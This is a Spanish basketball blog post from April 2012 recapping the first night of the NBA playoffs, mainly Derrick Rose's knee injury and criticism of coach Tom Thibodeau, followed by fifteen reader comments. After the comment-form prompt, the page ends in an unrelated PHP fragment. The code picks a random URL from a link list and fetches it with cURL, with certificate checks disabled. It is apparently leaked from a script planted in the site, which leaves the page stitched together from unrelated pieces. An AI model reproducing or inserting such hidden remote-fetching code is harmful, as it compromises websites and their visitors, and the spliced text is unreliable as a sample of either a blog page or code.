La Crónica: Thibodeau CoY (“Cagada” of the Year)

29 de April de 2012 por TheDeerHunter

droseinjuryNos gustaría abrir los Playoffs de este curso hablando de actuaciones épicas, jugadas fabulosas, defensas asfixiantes, momentos de infarto, sorpresas increíbles… Sin embargo, toca empezar por una desgraciada incidencia que puede poner patas arriba las eliminatorias por el título del Este. Lo anunciábamos en directo. Derrick Rose podía haberse lesionado seriamente la rodilla. Poco rato después se confirmaba lo peor. El cruzado anterior y adiós a los Playoffs, así como también a los Juegos Olímpicos. Encima es que la lesión se producía a un minuto para el final de un partido que tenían cómodamente ganado. No me habría gustado estar en la piel de Tom Thibodeau en ese momento.

Resulta del todo incomprensible que, con todos los problemas físicos que ha arrastrado Rose durante el curso, se encontrara en cancha a esas alturas. El mejor jugador de los Bulls lo estaba siendo también del choque. Rozaba el triple doble habiendo dominado tanto a Holiday como a Louis Williams. El resultado se movía en ventajas próximas a los 20 puntos y los locales se mostraban superiores en prácticamente cada aspecto de juego. Sólo una pájara a falta de 4’30” apretaba el marcador hasta los 12. Rose volvía a anotar, pero en ningún caso parecía verse amenazada la primera victoria. Su siguiente acción sería fatídica. Penetración de las suyas y en la batida algo falla. En el aire suelta la bola y cae al suelo, roto. Teniendo en cuenta cómo lo ha hecho Watson durante todo este tiempo y que John Lucas ni siquiera había abandonado el banquillo la situación se entiende aún menos. De esta forma es difícil creer que los Bulls pueden mantener sus elevadas pretensiones respecto al anillo.

Miami se frota las manos ante el camino que se les despeja. Lo celebraban con un palizón a los Knicks de muy señor mío. Al parecer los de New York no quedaron demasiado contentos con el arbitraje (26 faltas por las 17 locales, incluidos 33 TL) pero es que la diferencia fue de 33 puntitos. El esperado duelo Melo-LeBron causó sonrojo. Chandler venía de fiebres y, por si fuera poco, los Knicks perdieron a Shumpert con otra lesión de ligamentos. No hubo color. De habérselo propuesto, el resultado habría sido aún más de escándalo.

En Indianapolis, partido feo de solemnidad y sorpresa. Orlando tiró de veteranía para romper el carácter de Pacers y así, la ventaja campo. Los de Florida apretaron atrás y en Indiana pesó la responsabilidad (canguelo, como se dice en mi pueblo). Quitando David West, nadie encontró su juego por los locales. Por el contrario, tanto Nelson como Glenn Davis se prestaron como soporte a los suyos para obtener un valiosísimo resultado.

En Oklahoma, primer susto para los favoritos. Los Thunder tuvieron que sudar sangre para doblegar a los Mavs. No bastaba con que el trío Durant-Westbrook-Harden anotara 70 puntos y una versión superlativa de Ibaka, que entre otras cosas se cascó su segundo triple de la temporada. Los de Dallas exigieron, además de todo esto, una canasta que roza lo sobrehumano de Durant para ganar el partido. Los Mavs pusieron sus credenciales sobre la mesa y, liderados por un Terry casi infalible, tuvieron cerquísima el 0-1. Pero se les escapó. Sin duda, sera una serie de ajustes a cada partido que pase, si se alarga el físico jugara a favor de Oklahoma (ayer 11 tapones por 3 de Dallas) y la experiencia a favor de los Mavs. Tienen trabajo Brooks y Carlisle.

melobronPREMIOS

MVP: Desgraciadamente, sera la última vez que nombremos a Derrick Rose en este apartado esta temporada, hasta el momento de la lesión completaba un partidazo con 23 puntos, 9 rebotes y 9 asistencias. El que rondará por aquí casi cada día será LeBron. Anoche machacó a los Knicks con 32 puntos, 4 rebotes y 4 robos, con 10 de 14 en tiros de campo. Además, le amargó la noche a Carmelo en defensa. Durant sufrió para anotar, pero además de sus 25 puntos, 6 rebotes, 4 asistencias y 4 tapones nos regaló una de esas canastas de las que se habla en las charlas con los colegas durante muchos años.

Rookie: No es momento de novatos.

Sorpresa: Excelente papel de Mario Chalmers con 11 puntos, 9 asistencias y 3 robos de balón, liberando a LeBron de tareas de distribución. No es tan sorprendente, pero tampoco es habitual ver a Ibaka anotar 22 puntos con un 9 de 12 en tiros, incluido un triple.

Decepción: Nos decepciona enormemente el error de bulto de Tom Thibodeau. Nadie puede predecir algo así, pero mejor no correr el riesgo cuando no es necesario. Y ojito al juego exterior de los Pacers: los 5 jugadores que lo forman dejaron un acierto en el tiro de 15 de 49. Eso es dar muchas facilidades. Además, en el batacazo de NY al perder de 33 en Miami, el rendimiento de Amare es vergonzoso.

MEV: David West confirma que llega en un buen momento, con un 19-9 y 8 de 14 en tiros. Pero estuvo realmente solo. Jason Terry anotó 20 puntos y repartió 5 asistencias casi sin fallo en el tiro. Completa el trío de veteranos Elton Brand, con 19 puntos, 7 rebotes y 4 tapones. En los Knicks nadie hizo un gran esfuerzo.

Vídeo: The 2012 NBA Playoffs Have Arrived!

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Echarle la culpa de una lesión al entrenador me parece bastante frívolo… El coach pone en la pista a los que mejor están y los que pueden ganar el partido. Si el jugador dice que está listo, qué hacer entonces? Lo sientas contra su voluntad? Ya sabemos como funcionan las estrellas. Tú sentarías a Bryant con sus mil lesiones porque se pueda joder de verdad en cualquier momento? Él permitiría que lo sentases? Echaríamos la culpa a Phil Jackson si hace un año o dos se hubiera jodido Bryant jugando tocadísimo de la rodilla? No sé, yo creo que las lesiones son fortuitas. De hecho, creo que Rose ha salido criticando a sus fisios por los fuertes vendajes en el tobillo, que es la lesión que venía arrastrando esta temporada. Un ACL de estos es impredecible. No estoy para nada de acuerdo con culpar al entrenador, y mucho menos con restarle méritos o como decís vosotros, que por esta lesión ya no sea el entrenador del año, como si fuera un error suyo…

      Citar

  2. Jose Luis dice:
    #2

    No es su culpa que se lesione, pero sí es su culpa que esté en cancha en ese momento, cuando se aunaban todos los factores para que estuviera en el banquillo descansando y tratándose el resto de lesiones que ya llevaba a cuestas.

      Citar

  3. TheDeerHunter dice:
    #3

    No es que le culpemos directamente de la lesión, por supuesto, es una desgracia. Sin embargo se dice que “tanto va el cántaro a la fuente que al final se rompe”. Lo lógico con los antecedentes este curso de Rose es conservarle, eso me parece evidente. La responsabilidad de la rotación es del técnico, y su nivel también se mide en ese tipo de cosas. Uno no es “coach of the year” por bajarse los pantalones con la primera estrellita con la que se cruza. Y me pregunto con qué ganas va a afrontar Watson lo que queda de eliminatoria después del “castigo” de ayer.
    Para mí, desgracia a parte, cagada del técnico y si fuera de los Bulls estaría jodidamente cabreado con él. Lo siento mucho.

      Citar

  4. Sancho88 dice:
    #4

    Ok, pero tampoco podemos aislar esta lesión como algo totalmente fortuito, y eso que una lesión tiene casi siempre un elevadísimo porcentaje de desgracia y suelen ser inevitables. Este año estamos viendo demasiadas desgracias parecidas, y ha habido un calendario brutal, sin dos días de descanso real para nadie, porque si no jugabas dos noches, tenías que viajar a hacer una gira, etc. Ese desgaste físico es responsabilidad de la NBA. Vale que tienen unos seguros médicos del copón bendito, pero me parece que se han pasado mil pueblos poniendo 66 partidos en 4 meses… de locos símplemente. Dicho esto, entiendo también las críticas a Thibodeau, sobre todo en el aspecto de rotación, ya que efectivamente el temporadón que ha hehco Watson les ha dado en parte ventaja de campo hasta la final contra el Oeste (que me parece que ya no jugarán). Entonces, sí es cierto que debería rotar más y darle descansos a Rose, pero yo pienso que quitar a una estrella debe ser sumamente jodido. Por hacer símiles futbolísticos, aunque a mí tampoco me gustan ni un pelo cuando hablamos de baloncesto, es como cuando Cristiano tiene doscientas mil lesiones por patadas que le dan y dice que el va a jugar los 90 minutos… tiene que ser bastante difícil quitarle. Pues igual con un tío que ha sido el último MVP de la liga y la clave para volver a resucitar a Chicago en el panorama baloncestístico de la NBA. No sé, son muchos factores, ninguno se puede aislar de ninguno, y varias personas tienen culpa, incluso el propio Rose por no asumir que no está al 100% y decírselo al coach para que rote. Las estrellas suelen ser caprichosas, y yo estoy convencido de que nunca dicen que no están del todo bien. Así que la culpa es de la NBA por el calendario de locos, de Thibodeau por no administrar mejor los minutos, del propio Rose por no asumir que no está al 100%, y de la mala suerte porque la lesión de ligamentos siempre es mala suerte. Por eso yo creo que no se puede individualizar la culpa solo en el coach, es realmente lo que pienso, aunque no le eximo de parte de culpa, por supuesto

      Citar

  5. MagicJohnson32 dice:
    #5

    Oye, Sancho ¿todavía nos creemos a los Pacers o ya no?

      Citar

  6. Sancho88 dice:
    #6

    MagicJohnson32:
    Oye, Sancho ¿todavía nos creemos a los Pacers o ya no?

    Hombre, por supuesto que sí que nos los creemos. Yo ya había dicho que suelen tener lagunas, y también había dicho que Orlando es un equipo experto que le iba a ganar algún partido por eso mismo, pero sigo viendo favoritos a Pacers. Yo pronostiqué un 4-2 y lo mantengo, al igual que mantengo lo de Hibbert. 3/11

      Citar

  7. GreenPride dice:
    #7

    Primera noche de PO y una cosa clara, el Este debería ser un paseo triunfal para los Heat. Los Pacers no dan la talla y los Bulls se quedan sin su estrella y ellos hacen un gran partido con LeBron comiéndose a Melo.
    En cuanto a la polémica por la lesión de Rose no creo que se pueda culpar al entrenador, es una desgracia y el será el que más se lamentará. Dicho esto y en vista que la lesión no tiene nada que ver con sus molestias creo que podría haber pasado en cualquier momento. Con esta lesión ¿Se acaban las opciones de los Bulls? Yo creo que al anillo sí. Aún les doy favoritos en esta eliminatoria por supuesto y les veo con problemas si pasan los Celtics en la siguiente y casi imposible que ganen a los Heat en las posibles finales de conferencia.
    Por lo demás, cagadón de los Pacers que aún así les veo ganando la eliminatoria aunque no les veo ninguna opción en la siguiente.
    En el Oeste, ocasión perdida por los Mavs. El duelo Durant-Nowizki no existió hasta el último momento ya que los dos estuvieron fatal pero el gran partido de Terry y Marion parecía que les daba la victoria a los Mavs. En el último cuarto Robin Hood estuvo bastante bien pero una reacción final de los Thunder liderados por Harden llevó al final igualado y ahí Durantula decidió con un poco de suerte. Gran partido en ataque y defensa de Ibaka
    Creo que los Mavs van a tener sus opciones aunque acaben pasando los Thunder a los que no les veo suficientemente finos para aspirar al anillo de momento

      Citar

  8. rumbero dice:
    #8

    A Thibodeau se le puede criticar que no le diera descanso a Rose con todas las molestias que arrastra, pero una lesión asi es una desgracia que se hubiera podido dar en cualquier momento. Una lástima para el espectáculo, creo que todos queriamos ver si este era el año de los Bulls.
    El Heat-Knicks, más allá del arbitraje, fue una barrida en toda regla. Muchísimas pérdidas de los Knicks, mal Melo y mal los interiores. Así imposible. A Lebron cuando se le pone asi el partido no perdona ,10/14 tremendo en PO. Y muy de acuerdo con lo de Chalmers. Está asumiendo el papel que tiene en el equipo y tirando muy bien.
    Con el Mavs-Thunder ya no pude, pero parece que se merece ver un resumen de él. Lo de Durant es un clutch-semichurro pero como dice Sancho, estas son las que meten los buenos.

      Citar

  9. simon dice:
    #9

    Este tipo de lesiones son fortuitas y nunca se sabe cuando puede pasar, es como un esguince puede llegar en cualquier momento…

      Citar

  10. Javijaen dice:
    #10

    Parece que nadie vio el partido de Knicks de anoche…
    Se resume en el segundo cuarto, cuando el arbitraje PO sacó todas sus armas…
    4 faltas a Chandler en ¡11 minutos! incluida una flagrante, 5 faltas ofensivas en poco más de 15 minutos, Lebron haciendo teatrito con JR y con Chandler, sacaron a los Knicks del partido, y si a eso sumamos que Amare no estuvo, y que Melo se marcó un 1/8 en sus primeros tiros, podemos decir que a mitad de partido se acabó todo. En los primeros minutos más “normales”, el partido estaba igualado, con Heat más incisivo que los Knicks, pero algo peor en rebote, lo que hizo que los de Nueva York fueran más o menos a la par, ya que el double team sobre Melo lo aprovechaban los exteriores. Ya digo, hasta el recital arbitral… Una pena porque no se vio nada de Wade ni de Bosh, ni tampoco de los de Woodson… A ver si el próximo es más tranquilo, aunque con el pique Lebron-Melo no lo creo.

    Por otra parte, la lesión de Rose deja el Este despejado, y con los Thunder sudando mucho contra Mavs, a ver quién es el listo que da un favorito claro…

      Citar

  11. Nacho dice:
    #11

    La leche con los árbitros…
    Todas las de ataque fueron faltas de ataque
    Sólo la flagrante (aunque dura) y el teatrito ante JR son cagadas. El partido por otra parte, no lo necesitaba.
    ¡Coño! que odio a LeBron y los Heat, pero vamos, llorar por los árbitros me parece demasiado…

      Citar

  12. simon dice:
    #12

    Estan poniendo ahora mismo el Knicks- Heat por Canal plus, acaba de empezar el tercer cuarto y la verdad en el segundo cuarto solo veo una falta que no es y que fue pitada que fue la de JR cuando Lebron le roba el balón que ahi hace teatro y no hay falta, todas las demás son falta lo mireis por donde lo mireis. Y la flagrante es quizá excesiva fue una falta durisima pero que quizá no merecia la flagrante pero desde luego si que esta esa falta en esa linea entre flagrante/no flagrante.

      Citar

  13. oli dice:
    #13

    Alguno tiene la league pass?? sabia que bloqueaban algun partido porque los da el plus, pero de la jornada de ayer y la de hoy estan todos bloqueados? eso es normal? si es asi es una verguenza!!

      Citar

  14. German dice:
    #14

    Que bronca la lesion de Rose, todo por hacer un triple doble. Miami tiene servida en bandeja la Conferencia Este

      Citar

  15. Txusma dice:
    #15

    Fin de semana fuera, vuelvo y me encuentro con la lesión de Rose. Adiós al anillo… Mala suerte!

    Se pasará e incluso a lo mejor se lleva a final de conferencia pero ese será el tope de los Bulls.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>